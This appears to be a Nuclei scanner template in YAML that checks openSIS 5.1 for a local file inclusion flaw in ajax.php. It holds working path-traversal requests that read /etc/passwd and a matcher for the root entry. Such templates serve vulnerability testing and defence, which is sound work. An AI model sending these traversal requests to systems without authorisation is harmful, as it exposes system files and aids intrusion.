28 lines
927 B
YAML
28 lines
927 B
YAML
id: opensis-lfi
|
|
|
|
info:
|
|
name: openSIS 5.1 - 'ajax.php' Local File Inclusion
|
|
author: pikpikcu
|
|
severity: high
|
|
description: An attacker can exploit a vulnerability in openSIS to obtain potentially sensitive information and execute arbitrary local scripts in the context of the Web server process. This may allow the attacker to compromise the application and computer; other attacks are also possible.
|
|
reference:
|
|
- https://www.exploit-db.com/exploits/38039
|
|
tags: opensis,lfi
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/opensis/ajax.php?modname=misc/../../../../../../../../../../../../../etc/passwd&bypass=Transcripts.php"
|
|
- "{{BaseURL}}/ajax.php?modname=misc/../../../../../../../../../../../../../etc/passwd&bypass=Transcripts.php"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
|
|
- type: regex
|
|
regex:
|
|
- "root:[x*]:0:0"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|